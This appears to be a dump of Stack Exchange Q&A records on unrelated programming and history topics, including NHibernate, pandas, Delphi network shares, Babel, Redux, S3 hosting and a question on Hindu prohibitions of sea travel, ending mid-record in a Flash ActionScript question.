NHibernate.\nI'm currently extending DefaultSaveOrUpdateEventListener, overriding PerformSaveOrUpdate, going through the properties of each entity and saving them elsewhere.\nThis works with simple properties, but fails when cascade-saving a one-to-many relationship.\nIf I take the following entities:\n<code>[ActiveRecord]\npublic class Child\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [BelongsTo]\n public Parent Parent { get; set; }\n}\n\n[ActiveRecord]\npublic class Parent\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [HasMany(Cascade = ManyRelationCascadeEnum.SaveUpdate)]\n public IList<Child> Children { get; set; }\n}\n<\/code>\nAnd then save a parent with a child:\n<code>ActiveRecordMediator<Parent>.Save(new Parent\n{\n Children = new List<Child>\n {\n new Child()\n }\n});\n<\/code>\nThe child will get the correct parent assigned to it when its persisted to the database but the 'Parent' property of the child is null when my EventListener is called.\nHow can I get the value that will actually be persisted to the database in this case?\n[EDIT] I've recently been looking at getting this to work by hooking the cascade and seeing what else was being saved at the time, but that seems horribly unreliable and I'd much prefer to get the data out of NHibernate so I know it's consistent with the database.\nAnswer: I'm not sure how you can accomplish this with ActiveRecord but it has to do with the mechanism in which NHibernate persists parent\/child relationships.\nSaving the child cascade prior to saving the parent in NHibernate is by design depending on which end of the relationship is marked as \"inverse=true\" and the child needs to have a \"not-null=true\" attribute on the element (which determines which end owns the relationship). This will make it so the Child is managing the state of the relationship.\nThen you can simply save the child, and the parent will be updated with the appropriate information. This will generate one INSERT statement, instead of an INSERT AND UPDATE that you are probably seeing now. Not sure if this solves your problem, but I believe the problem you are having is around this behavior. You can read more at this link:\nhttps:\/\/www.hibernate.org\/hib_docs\/nhibernate\/html\/example-parentchild.html\nComment: Thanks - I'm not sure that solves my actual issue (Child.Parent is still null at the point where my listener is executed) but at least I understand a case where my code doing nasty hacks for cascade saving and I fixed a bug.\nAnswer: I don't use ActiveRecord, I use NHibernate instead so I'm going to assume that they handle parent-child relationships in the same way (https:\/\/www.hibernate.org\/hib_docs\/nhibernate\/html\/example-parentchild.html)\nWhat happens if you leave the ORM to manage the link to the parent (by setting Inverse=true in the HasMany attribute)?\n<code>[ActiveRecord]\npublic class Parent\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [HasMany(Cascade = ManyRelationCascadeEnum.SaveUpdate, Inverse=true)]\n public IList<Child> Children { get; set; }\n}\n<\/code>\nComment: Hi Ben. Alas, as far as I could tell that makes no difference.\nAnswer: I see that you use Castle ActiveRecord. I was experimenting with it also.\nThere is some weirdness in it, because in the code you provided, the Child object's Parent property will only be set after your stuff is saved to the database. Until then, its value will be null. (I don't know if this behaviour is specific to ActiveRecord, or also NHibernate.)\nPerhaps if you assign the Parent properties of the Child objects by hand, it will work.\n<code>var parent = new Parent();\nvar child = new Child()\n{\n Parent = parent\n};\nparent.Children.Add(child);\n\nActiveRecordMediator<Parent>.Save(child);\nActiveRecordMediator<Parent>.Save(parent);\n<\/code>\nMaybe the order in which you save the entities also has to do something with this matter.\nComment: Yes and no. It works, but it works because NHibernate isn't doing the cascade saving - the developer is doing it. Unfortunately it would mean disabling cascade saving, which is pretty fundamental to a decent ORM. Thanks for the suggestion though.\nComment: Actually, cascade saving works well, but there is the issue that a child doesn't get its parent set, until it is saved. (Or at least that was the case in ActiveRecord last time I tried.)\nYour event listener recieves the children before it happens.\n","meta":{"source":"stackoverflow","title":"NHibernate EventListeners - getting the value of a property of the entity being saved","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pandas -- resolving row merge conflicts by selecting shorter text\n\nQuestion: I have a Pandas dataframe with two columns: String ID (not unique), String text.\nI want to build a dataframe with two columns: String ID (unique), String text.\nTo make my IDs unique, I need to merge all rows with matching IDs.\nHowever, the rows with identical IDs all have different text contents.\nWhen merging, I want the row with the shortest text content to take precedence.\nHow can this be done?\nThank you so much in advance!\nAnswer: You can write your own aggregation function, see more here -\n<code>import pandas as pd\ndf = pd.DataFrame({'id': [1, 2, 1, 2], 'text': ['ab', 'a', 'b', 'aa']})\n\ndef shortest_agg(s):\n lst = s.tolist()\n return sorted(lst, key = lambda x: len(x))[0]\n\ndf.groupby('id').agg(shortest_agg)\n\n#result \ntext\nid\n1 b\n2 a\n<\/code>\n","meta":{"source":"stackoverflow","title":"Pandas -- resolving row merge conflicts by selecting shorter text","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sharing a folder programmatically and revoking it. (Delphi 7)\n\nQuestion: \nHow does one programmatically create a UNC share from a known directory?\nHow does one revoke it programmatically?\n\nI don't want the user to fiddle with the Share dialog. Additional info such as changing the share name, comment, user limit is also welcomed.\nThanks\nSoulBlade\n(Using Delphi 7)\nAnswer: Create the share with NetShareAdd. This will share the directory with a null ACL, which is equavalent to allowing everyone full access. \nDelete the share with NetShareDel.\nMadshi's MadSecurity package has a helper which simplifies this down to:\n<code>NewShare(path, shareName, remark);\nShare(shareName).Delete;\n<\/code>\nAnswer: Here's a snippet of code I use with Delphi 2007:\n<code>uses\n AclApi, AccCtrl;\n\ntype\n PShareInfo2 = ^TShareInfo2;\n TShareInfo2 = packed record\n shi2_netname: PWideChar;\n shi2_type: DWORD;\n shi2_remark: PWideChar;\n shi2_permissions: DWORD;\n shi2_max_uses: DWORD;\n shi2_current_uses: DWORD;\n shi2_path: PWideChar;\n shi2_passwd: PWideChar;\n end;\n\nconst\n SECURITY_WORLD_SID_AUTHORITY: TSidIdentifierAuthority = (Value: (0, 0, 0, 0, 0, 1));\n SECURITY_WORLD_RID = ($00000000);\n\n NERR_Success = 0;\n\n advapi = 'advapi32.dll';\n netapi = 'netapi32.dll';\n\nprocedure BuildExplicitAccessWithNameW(pExplicitAccess: PEXPLICIT_ACCESS_W; pTrusteeName: PWideChar;\n AccessPermissions: DWORD; AccessMode: ACCESS_MODE; Ineritance: DWORD); stdcall;\n external advapi name 'BuildExplicitAccessWithNameW';\nfunction GetNamedSecurityInfoW(pObjectName: PWideChar; ObjectType: SE_OBJECT_TYPE; SecurityInfo: SECURITY_INFORMATION;\n ppsidOwner, ppsidGroup: PPSID; ppDacl, ppSacl: PACL; var ppSecurityDescriptor: PSECURITY_DESCRIPTOR): DWORD; stdcall;\n external advapi name 'GetNamedSecurityInfoW';\nfunction NetShareAdd(servername: PWideChar; level: DWORD; buf: Pointer; parm_err: LPDWORD): DWORD; stdcall;\n external netapi;\nfunction NetShareDel(servername, netname: PWideChar; reserved: DWORD): DWORD; stdcall; external netapi;\nfunction SetNamedSecurityInfoW(pObjectName: PWideChar; ObjectType: SE_OBJECT_TYPE; SecurityInfo: SECURITY_INFORMATION;\n ppsidOwner, ppsidGroup: PPSID; ppDacl, ppSacl: PACL): DWORD; stdcall; external advapi name 'SetNamedSecurityInfoW';\n\nprocedure NetApiCheck(RetValue: Cardinal);\nbegin\n if RetValue <> ERROR_SUCCESS then\n RaiseLastOSError(RetValue);\nend;\n\nfunction WideGetEveryoneName: WideString;\nvar\n psid: PSECURITY_DESCRIPTOR;\n Dummy: WideString;\n NameLen, DomainNameLen: Cardinal;\n Use: SID_NAME_USE;\nbegin\n Result := '';\n\n if not AllocateAndInitializeSid(SECURITY_WORLD_SID_AUTHORITY, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, psid) then\n Exit;\n try\n NameLen := 0;\n DomainNameLen := 0;\n Use := 0;\n if LookupAccountSidW(nil, psid, nil, NameLen, nil, DomainNameLen, Use) or\n (GetLastError <> ERROR_INSUFFICIENT_BUFFER) then\n Exit;\n\n if NameLen = 1 then\n Exit;\n\n SetLength(Result, NameLen - 1);\n SetLength(Dummy, DomainNameLen);\n\n if not LookupAccountSidW(nil, psid, PWideChar(Result), NameLen, PWideChar(Dummy), DomainNameLen, Use) then\n Result := '';\n finally\n FreeSid(psid);\n end;\nend;\n\nfunction WideDeleteShare(const ShareName: WideString): Boolean;\nbegin\n Result := NetShareDel(nil, PWideChar(ShareName), 0) = NERR_Success;\nend;\n\nprocedure WideShareDirectory(const Directory, ShareName, Description: WideString; ReadOnly: Boolean);\nvar\n ShareInfo: TShareInfo2;\n OldAcl, NewAcl: PACL;\n psid: PSECURITY_DESCRIPTOR;\n ExplicitAccess: EXPLICIT_ACCESS_W;\nbegin\n FillChar(ShareInfo, SizeOf(ShareInfo), 0);\n ShareInfo.shi2_netname := PWideChar(ShareName);\n ShareInfo.shi2_type := STYPE_DISKTREE;\n ShareInfo.shi2_remark := PWideChar(Description);\n ShareInfo.shi2_max_uses := SHI_USES_UNLIMITED;\n ShareInfo.shi2_path := PWideChar(Directory);\n NetApiCheck(NetShareAdd(nil, 2, @ShareInfo, nil));\n \/\/ Full Control to Everyone is granted by default\n if not ReadOnly then\n Exit;\n\n NetApiCheck(GetNamedSecurityInfoW(PWideChar(ShareName), SE_LMSHARE, DACL_SECURITY_INFORMATION, nil, nil, @OldAcl, nil,\n psid));\n try\n FillChar(ExplicitAccess, SizeOf(ExplicitAccess), 0);\n BuildExplicitAccessWithNameW(@ExplicitAccess, PWideChar(WideGetEveryoneName),\n GENERIC_READ or STANDARD_RIGHTS_READ or SPECIFIC_RIGHTS_ALL, SET_ACCESS, NO_INHERITANCE);\n NetApiCheck(SetEntriesInAclW(1, @ExplicitAccess, OldAcl, NewAcl));\n try\n NetApiCheck(SetNamedSecurityInfoW(PWideChar(ShareName), SE_LMSHARE, DACL_SECURITY_INFORMATION, nil, nil, NewAcl,\n nil));\n finally\n LocalFree(HLOCAL(NewAcl));\n end;\n finally\n LocalFree(HLOCAL(psid));\n end;\nend;\n<\/code>\nYou can specify the user limit in <code>TShareInfo2.shi2_max_uses<\/code> (my procedure always creates an unlimited share).\n","meta":{"source":"stackoverflow","title":"Sharing a folder programmatically and revoking it. (Delphi 7)","dup_signals":{}},"subset":"stackexchange"} +{"text":"When did Hinduism forbid overseas travel?\n\nQuestion: Reading a comment made on this site, I saw something very curious:\n\nWhy not blame it on the ancient Hindu belief that traveling overseas pollutes a person irredeemably, thereby stunting the growth of Indian naval technology and ensuring Europeans came to India rather than vice versa?\n\nSearching on Google, I find quite a few people debating whether there are current rules against overseas travel, or what the penalties are, but I haven't been able to find anything about this belief in ancient days.\nI know that Hinduism did spread to Indonesia at one point, so I imagine there was no prohibition against overseas travel in those days. So, to be more specific:\nWhen did Hinduism first prohibit overseas travel, and when did it stop prohibiting overseas travel?\nComment: Googling for this (as I did) came up with a number of conflicting claims on this point, so it seems like a legitimate question to ask here.\nComment: If you cite the conflicting claims, you prove that you've done the research, and help us to deconflict and resolve the claims.\nComment: It seems to me that the beliefs of Indians during the Iron Age are *quite* on topic here. I'm confused why this would be held as off-topic.\nComment: Putting this question on hold for insufficient research *does* seem reasonable, though. (@MarkC.Wallace)\nComment: Most of the questions related to Indian culture and hinduism are offtopic here, why is it so? Are religions not a part of history?\nComment: @AskingStory, that would be a good question for you to ask on meta.history.se, though I would disagree with your observation.\nComment: I think the Achaemenids, but maybe the Parthians, had an aversion to water based trade as impure. So it may have very old, Indo Aryan roots.\nAnswer: According to this article in Hinduism Today (July\/August\/September 2008), samudrayana (ocean voyage) is forbidden in the Shastras, but it may not be binding on current followers -- instead they may go through ritual purification after travel. The relevant passage is below:\n\nThe Baudhayana Sutra, one of the Hindu Dharma Shastras, says that\n \"making voyages by sea\" (II.1.2.2) is an offense which will cause\n pataniya, loss of caste. It offers a rather difficult penance: \"They\n shall eat every fourth mealtime a little food, bathe at the time of\n the three libations (morning, noon and evening), passing the day\n standing and the night sitting. After the lapse of three years, they\n throw off their guilt.\"\nComment: @PieterGeerkens There are four castes (varnas). Untouchable is the state you enter when you lose your caste. Sometimes it is referred to as the fifth caste, but it is not technically so. So, in this case, loss of caste is not something anyone would want--though technically I suppose it would have no effect on someone who is already an untouchable.\nComment: @called2voyage: Thank you for the explanation.\nComment: How did Ghandi purify himself after traveling to England?\nComment: @RonJohn [Mahatma Gandhi was from the merchant \/ Baniya caste](https:\/\/en.wikipedia.org\/wiki\/Mahatma_Gandhi) so, as Pradeep explains below this would not apply to him as it mainly focuses on higher caste people.\nComment: *Loss of caste*; for many (such as untouchables), wouldn't that be an *incentive* rather than a *disincentive* to take a sea voyage?\nAnswer: The term in Sanskrit \"Sagara Ullanghana\" or \"Samudra Ullanghana\" is the term mainly used to prohibit upper caste i.e. Brahmins who have learnt Vedas and do daily 'Pujas' and 'Sandhyavandanam' from crossing the sea or ocean. This article Hindus and Ocean Taboo gives the complete picture of it and also what a Brahmin says about \"making voyages by sea\".\nBaudhayana Dharma and Grahya Shastra and Manu Smriti extensively mentions castes and imposes strict rules to be followed by those castes. But most of them concentrate on Brahmins and their Do's and Don'ts. But samudrayana was allowed to other castes because since Vedic period people from India have traveled across the world for trade. And another example is Hindu culture in Indonesia.\nAnswer: Samudrayana, overseas travel, has always been forbidden to an observant Hindu because it would necessarily involve coming into contact with a non Hindu, which is an uncleansable defilement. In itself, there is nothing wrong with travel, but to have contact with foreigners, with the Dasyu, and their food is a fundamental violation of Hindu Brama, purity of being.\nIn Hinduism, everything is gradation. Thus, a Brahman who defiles himself by martial activities becomes a Ksatriya, which in itself has its own honors, or perhaps something worse. The more defilement you bring upon yourself, the deeper your dishonor and degradation. This is what is meant by \"loss of caste\". Conversely, by right and pure conduct a person may ascend and become higher in grade, even a Brahman.\nTo have regular contact with unbelieving foreigners, the Dasyu, is considered to be so defiling that there is no coming back in one lifetime.\nAnswer: Raja Ram Mohan Roy was the first hindu Brahmin who ignored the old rule of ocean travelling prohibition... on 15th November 1830.\nComment: Do you have a source for this? Can you say a bit more about the circumstances (e.g. why he ignored it)?\n","meta":{"source":"history.stackexchange","title":"When did Hinduism forbid overseas travel?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to compile ioping with cygwin\n\nQuestion: Using Cygwin on Windows 7 x64. Extracted 'ioping' source into '\/home'\nThis is the result:\n<code>$ make\ntest ! -d .git || git describe --tags --dirty=+ | sed 's\/^v\/\/;s\/-\/.\/g' > version\ncc -std=gnu99 -g -Wall -Wextra -pedantic -DVERSION=\\\"0.8\\\" -c -o ioping.o ioping.c\nioping.c: In function 'get_device_size':\nioping.c:602:3: error: #error no get disk size method\n # error no get disk size method\n ^\nMakefile:46: recipe for target 'ioping.o' failed\nmake: *** [ioping.o] Error 1\n<\/code>\nTrying to compile a Windows executable. I'm new to Cygwin. Seems like a preprocessor is missing when looking at the code.\nSource: https:\/\/github.com\/koct9i\/ioping\nEdit:\nSee accepted asnwer user, 'user3629249' and my comments for full answer.\nNote of the linked source. 'Readme' says it works on windows, Tried running it on Win 7 Ultimate 64-bit with SSD and it errors out with \"preparation write failed: no error\".\nComment: you really should NOT have placed the ioping project files in your `home` directory. rather, create a sub directory. Then place the project files in that sub directory.\nComment: I was terse for simplicity at the time, but I actually put it in it's own dir, just didn't show it above, just wanted to point out what seemed like was the most relevant base dir. But yes for posterity, it should be located in a sub dir for organizational reason. Some may see as nitpicking, but a good point none the less.\nAnswer: the function: <code>get_device_size()<\/code> selects certain `ioctl() depending on the underlying OS. \nwhich <code>ioctl()<\/code> depends on which of the following are defined at <code>make<\/code> time\n\n<code>__linux__<\/code>\n<code>__gnu_hurd__<\/code>\n<code>__FreeBSD__<\/code>\n<code>__FreeBSD_kernel__<\/code>\n<code>__DragonFly__<\/code>\n<code>__OpenBSD__<\/code>\n<code>__APPLE__<\/code>\n<code>__sun__<\/code>\n<code>__MINGW32__<\/code>\n\nBrowse your environment variables\nI would expect some environment variable like <code>__cygwin__<\/code>\nWhich ever environment variable seems most likely to be the appropriate one, add the name of the environment variable to the sets of preprocessor blocks near the top of the <code>ioping.c<\/code> file and again in the <code>get_device_size()<\/code> function.\nComment: Simplest solution for me was installing standalone 'MinGW'. From what I read it would have taken some work to get it working with Cygwin(Didn't want to take chance of messing up Cygwin environment settings as I use it for other things) Thanks for the attempt.\nComment: the utility `MinGW` is for windows, not a unix like environment. The only changes would be within the oping.c file not in the cygwin environment. however, if you do not want to change the *.c file, then in your .bashrc file add statements similar to `set __linux__ ` and `export __linux__`\n","meta":{"source":"stackoverflow","title":"How to compile ioping with cygwin","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to build this grid with less code?\n\nQuestion: I have the diagonal and both upper and lower triangulars of a grid.\n<code>diag = {1, 2, 3, 4};\nupper = {{u12, u13, u14}, {u23, u24}, {u34}};\nlower = {{l21}, {l31, l32}, {l41, l42, l43}};\n<\/code>\nI want to combine this and display them in a grid with shading. My code for this is very bulky and I can't help feeling I've missed some function that would make more compact and easier to read. I also would rather not convert everything into <code>Item<\/code> to get the shading I want.\n<code>diag = Item[#, Background -> LightGray] & \/@ diag;\nupper = Map[Item[#, Background -> LightBlue] &, upper, {2}];\nlower = Map[Item[#, Background -> LightGreen] &, lower, {2}];\nfirst = Append[{diag[[1]]}, upper[[1]]] \/\/ Flatten;\nmid = Table[Append[{diag[[row]]}] \/* Append[upper[[row]]] \/* Flatten@\n lower[[row - 1]], {row, 2, 3}];\nlast = Append[lower[[3]], {diag[[4]]}] \/\/ Flatten;\nGrid[Partition[{first, mid, last} \/\/ Flatten, 4]]\n<\/code>\n\nIs there a more compact way to do this?\nAnswer: <code>(*Some pre-format, starting with your element definitions *)\ndiag = List \/@ diag;\nupper = Join[upper, {{}}];\nlower = Join[{{}}, lower];\n\n(*code *)\nf[els_, col_] := Map[Item[#, Background -> col] &, els, {2}]; \nGrid@MapThread[Join, {f[lower, LightBlue], f[diag, LightGray], f[upper, LightRed]}]\n<\/code>\nComment: I like the combination method you have used. Sneaky to add an empty row and and nest the diagonal.\nAnswer: Generally speaking I favour using <code>Grid<\/code> options for styling rather than using <code>Item<\/code>. For example make your matrix:\n<code>MatrixForm[m = Array[Subscript[a, ##] &, {4, 4}]];\n<\/code>\nthen:\n<code>Grid[m,\n ItemStyle -> {None, None, Flatten@MapIndexed[Which[\n #2[[2]] > #2[[1]], #2 -> Blue,\n #2[[2]] == #2[[1]], #2 -> Gray,\n #2[[2]] < #2[[1]], #2 -> Red\n ] &, m, {2}]}\n ]\n<\/code>\n\nDid you start with a matrix and then split it into upper, lower and diagonals? And if you did was that solely for the purpose of styling? If you did then just revert to your starting matrix. If somehow you actually only have the 3 components of the matrix then combine them simply like this:\n<code>m = RotateLeft@PadLeft[upper, {4, 4}] + \n RotateRight@PadRight[lower, {4, 4}] + DiagonalMatrix[diag];\n<\/code>\nOr, as per @wreach answer, use negative indexes rather than wrapping to do the rotating:\n<code>m = PadLeft[upper, {-4, 4}] + PadRight[lower, {-4, 4}] + DiagonalMatrix[diag];\n<\/code>\nThen use the grid styling as before:\n<code>Grid[m, Background -> {None, None, \n Flatten@MapIndexed[\n Which[#2[[2]] > #2[[1]], #2 -> Blue, #2[[2]] == #2[[1]], #2 -> \n Gray, #2[[2]] < #2[[1]], #2 -> Red] &, m, {2}]}]\n<\/code>\nComment: You aren't starting from the stated input. Was that on purpose?\nComment: wanted to simply address using `MapIndexed` rather than `Item` for styling of `Grid` but will update\nComment: Ah, using rules. Nice. I didn't realise the was possible but of course with `MapIndexed`.\nComment: @Edmund I find it more intuitive doing it that way but it is up to individual preference\nAnswer: A helper function can reduce the boilerplate somewhat:\n<code>a_ \/\/ itemize[c_] := Map[Item[#, Background -> c]&, a, {-1}]\n\nDiagonalMatrix[diag \/\/ itemize[LightGray]] +\nPadLeft[upper \/\/ itemize[LightBlue], {-4,4}] +\nPadRight[lower \/\/ itemize[LightGreen], {-4,4}] \/\/\nGrid\n<\/code>\nComment: +1 nice use of negative indexes to avoid rotating functions\nComment: @MikeHoneychurch I abandoned my first solution because your post got there first. Now I see that my second solution is much like your edit. Oh well, them's the MSE breaks. :)\nComment: I like your answer ...although I've never liked using `Item` :)\nComment: This combination is sweet. I looked at the padding functions but was trying to figure out how to do what you have done with the -4.\n","meta":{"source":"mathematica.stackexchange","title":"How to build this grid with less code?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Babel generated code causes error exports is undefined\n\nQuestion: When this code (generated from babel) runs I get an error <code>exports is undefined<\/code>\n<code>Object.defineProperty(exports, '__esModule', {\n<\/code>\nany ideas?\nAnswer: You are most likely not executing the code in an environment that supports CommonJS modules. You could use a bundler, such as Browserify or webpack\nto bundle your modules into something that can be run in different environments.\nOr you could choose a different module transformer.\n\nWith webpack\nRun <code>npm install -g webpack; npm install -D babel-loader<\/code>. Then with this webpack configuration:\n<code>\/\/ webpack.config.js\nmodule.exports = {\n entry: \".\/path\/to\/entry\/module.js\",\n output: {\n path: __dirname,\n filename: \"bundle.js\"\n },\n module: {\n loaders: [\n { test: \/\\.js$\/, exclude: \/node_modules\/, loader: \"babel-loader\"}\n ]\n }\n};\n<\/code>\nrunning the <code>webpack<\/code> command will convert all <code>*.js<\/code> files reachable via the entry file with babel and bundle them together into <code>bundle.js<\/code>.\nComment: Well, I would start with http:\/\/webpack.github.io\/docs\/tutorials\/getting-started\/ .\nComment: oh i thought I could just run the babel output in the browser\nComment: so I just download webpack in npm and use that script?\nComment: I recommend to read the webpack documentation :) Also see https:\/\/babeljs.io\/docs\/using-babel\/#webpack in that case.\nComment: I just want to create a script that will bundle it for a cdn that someone will use. They wont have webpack.\nComment: I understand. Webpack bundles all modules and produces a single file.\nComment: I'm not sure this helps me https:\/\/github.com\/babel\/babel-loader + the docs are a bit confusing to my case\nAnswer: I read an article about how ES6 import and export are only supposed to work in browser with \"statically analyzable files\" and Babel removed import and export support in the browser because of this. Something to do with async or possibly security?\nIf you want to skip the server-side bundling for dev purposes, you can put \n<code>window.MyModule = MyModule<\/code> at the bottom, then import \n<code>var MyModule = window.MyModule<\/code> at the top of your next file\n","meta":{"source":"stackoverflow","title":"Babel generated code causes error exports is undefined","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it just as difficult to find a desired output in a hash digest, for MSB vs LSB?\n\nQuestion: This question comes to mind after seeing \"custom\" Bitcoin addresses with some special string at the beginning of the address. They are generated in the same way Bitcoins are \"mined\", continually hashing with a nonce + password to get some desired output. \nMy question is, is it just as hard to find <code>[HLOWRLD]M9VveeBLcY4UC4vjpPs6rZtFBQE<\/code> as it is to find <code>1FpUYCpM9V[HLOWRLD]4UC4vjpPs6rZtFBQE<\/code> as it is to find <code>1FpUYCpM9VveeBLcY4UC4vjpPs6[HLOWRLD]<\/code>? *Note the values in the digest not in brackets can be any value\nThe reverse to the question, given you have some insane computer, would it be easier to try to find the input for <code>[HLOWRLD]M9VveeBLcY4UC4vjpPs6rZtFBQE<\/code> versus <code>1FpUYCpM9V[HLOWRLD]4UC4vjpPs6rZtFBQE<\/code> versus <code>1FpUYCpM9VveeBLcY4UC4vjpPs6[HLOWRLD]<\/code>?\nAnswer: As the other answers point out, output bits of a good hash function are uniformly distributed, so your substring has equal chance to appear in any part of the hash digest.\nHowever, in the case of Bitcoin, the address is not a random string. Not only it starts with a predefined number (1 or 3), but the string is the result of the Base58-conversion, which may (I did not check) produce biased outputs. The addresses may even be of different lengths.\nComment: The first byte after the `1` is *extremely* biased. Character Characters `2` to `P` occur with about 4.3% probability, characters `R` to `z` with 0.07% probability. `1` and `Q` are somewhere in the middle. I believe this results from the rare characters being *impossible* if the address has the usual length, only occurring in the rare case where the number is small enough to have a shorter encoding. The bias quickly disappears as you get to less significant digits.\nAnswer: With an ideal hash function each bit of the output is 1 independently with 50% probability. So to find a hash with $n$ bits chosen you have a $2^{-n}$ chance per guess. That's regardless of which bits you chose, so whether they are in the beginning or the end doesn't matter. If you accept either, you can have about twice the chance, though, and more if you also accept it in the middle.\nA Bitcoin address is a hash of an elliptic curve public key, so searching for them is just like searching for hashes \u2013 you cycle through private keys in some way, generate corresponding public keys which you then hash. The actual process is rather complicated, but the address is a concatenation of two truncated hashes, which you can treat as another hash function.\nHowever, for Bitcoin it's slightly faster to search for a match in the beginning, because that saves you two SHA-256 computations which you would need to calculate the final 32 bits of the address.\n","meta":{"source":"crypto.stackexchange","title":"Is it just as difficult to find a desired output in a hash digest, for MSB vs LSB?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Need help on grouping this SQL table\n\nQuestion: I have this table\n\nI want to group it like\n<code>ProductID Purchased Sold\n------------------------------------\n1 235 0.00\n2 125 0.00\n3 55 24.00\n<\/code>\nHere Purchased = (IsCreditor <> 0)\nI tried this\n<code>SELECT\n ProductID, \n Max (TotalQty) As Purchased,\n Min(TotalQty) As Sold\nFROM\n TestTable\nGROUP BY\n ProductID\n<\/code>\nIt will work only if a product have both IsCreditor = 0 and IsCreditor = 1\nThe table is a small part of a stored Procedure\nIn this table, for productid = 1, if it is not purchased or sold, it won't appear and if it is purchased it appears with a qty and IsCreditor = 1 and if it is sold, it appears with qty in one row with IsCreditor=0 and one more with isCreditor=1 \nAnswer: add a CASE statement to separate purchased and sold items\n<code> SELECT\n ProductID, \n SUM(Case When IsCreditor = 1 then TotalQty else 0 end) AS [TotalPurchase],\n SUM(Case When IsCreditor = 0 then TotalQty else 0 end) AS [TotalSale]\n FROM\n TestTable\n GROUP BY\n ProductID\n<\/code>\n","meta":{"source":"stackoverflow","title":"Need help on grouping this SQL table","dup_signals":{}},"subset":"stackexchange"} +{"text":"AWS S3 Static Website isn't serving css files\n\nQuestion: I've gone through most of the previous related questions and answers that appear similar to mine. Here are some of the things I have tried based on what others have suggested:\n\nMade bucket public\nClear browser cache\nI've updated the key and value to match text\/css\n\nWhen I click the website endpoint link inside of S3, the CSS files upload to the browser properly.\nBut when I go directly to the web address from the browser, the page contains no CSS.\nThe style.css file is saved to my local cpu. Any suggestions are appreciated.\nAnswer: You need to upload CSS file to the S3 bucket and make it public. Although your bucket is public, objects inside the bucket are not. You need to explicitly make them public. Uploading and making your CSS file public in public S3 bucket will resolve the issue.\nComment: Thanks for your reply. I've checked this and it did not resolve the problem. The bucket as well as the objects inside are public. Do you have any other suggestions?\nComment: Assume html and css files are public and in the same public bucket. Here's my entry for style.css file in index.html file.. Both index.html and style.css are public and in same public S3 bucket\nComment: It was the code. Thanks. I've been stuck on this for 2 days.\n","meta":{"source":"stackoverflow","title":"AWS S3 Static Website isn't serving css files","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add one item to the top of a redux store list while removing the bottom item from the list\n\nQuestion: I would like to remove only one item from a redux store list, once it has reached a certain number and return the new store with the new value added, but minus the first value on the list (array.shift).\nThink of a twitter stream that fills the store so every six tweets we are removing one from the bottom of the list and adding a new one to the top.\ncode:\n<code>\/\/ ------------------------------------\n\/\/ Action Handlers\n\/\/ ------------------------------------\nconst ACTION_HANDLERS = {\n [INIT_DATA]: (state, action) => {\n if (state.length < 5) {\n return [ ...state, action.payload.stream ]\n } else {\n return [ ...state.shift(), action.payload.stream ]\n }\n },\n [DISCONNECT]: (state, action) => ({ ...state, ...action.payload })\n}\n\/\/ ------------------------------------\n\/\/ Reducer\n\/\/ ------------------------------------\nconst initialState = []\n\nexport default function twitterStreamReducer (state = initialState, action) {\n const handler = ACTION_HANDLERS[action.type]\n\n return handler ? handler(state, action) : state\n}\n<\/code>\nThe above code returns a new store when lentgh > 5 and deletes all the old tweets not just the bottom one.\nAny ideas on the best way to do it without mutating the state?\nAnswer: You can use Array.slice which returns a shallow copy of your original array minus the sliced items. DO NOT use shift() which actually mutates your state and can cause all sorts of issues.\n<code>return [...state.slice(1), action.payload.stream]\n<\/code>\nAnswer: <code>Array#shift<\/code> returns the shifted value, not the array with the value removed (it shifts it in-place).\nYou can do\n<code>state.shift()\n[ ...state, action.payload.steam ] \n<\/code>\nalthough I'm pretty sure Redux docs specify that you should avoid acting on the state directly...\n","meta":{"source":"stackoverflow","title":"How to add one item to the top of a redux store list while removing the bottom item from the list","dup_signals":{}},"subset":"stackexchange"} +{"text":"Buttons Not Functioning as expected\n\nQuestion: I was wondering is someone can shed light on my code? It seems to work properly without any error, but certain buttons won't work. (i.e. Going to Investment Menu, then enter \"View Portfolio\", \"Investments\" and \" \"OK\" buttons won't work.)\nHere's the whole code.\n<code>import flash.events.MouseEvent;\nbg.stop();\/\/Buttons\nbg.ok.addEventListener(MouseEvent.CLICK, menu);\nfunction menu(m:MouseEvent):void\n{\n trace(m.target.name);\n trace(bg.currentFrame);\n if (bg.currentFrame == 1)\n {\n bg.ok.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(2);\n bg.menubtn.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame == 2 || bg.currentFrame == 4 && m.target.name == \"Menubtn4\" || bg.currentFrame == 5 && m.target.name == \"Menubtn5\" || bg.currentFrame == 6 && m.target.name == \"backtomain\" || bg.currentFrame == 7 && m.target.name == \"Menubtn7\" || bg.currentFrame == 9 && m.target.name == \"Menubtn9\" || bg.currentFrame == 13 && m.target.name == \"Menubtn13\" || bg.currentFrame == 20 && m.target.name == \"backtomenu20\" || bg.currentFrame == 24 && m.target.name == \"Menubtn24\" || bg.currentFrame == 27 && m.target.name == \"backtomenu27\" )\n {\n if (m.target.name == \"menubtn\")\n {\n bg.menubtn.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn4\")\n {\n bg.Menubtn4.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn5\")\n {\n bg.Menubtn5.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomain\")\n {\n bg.backtomain.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn7\")\n {\n bg.Menubtn7.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn9\")\n {\n bg.Menubtn9.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn13\")\n {\n 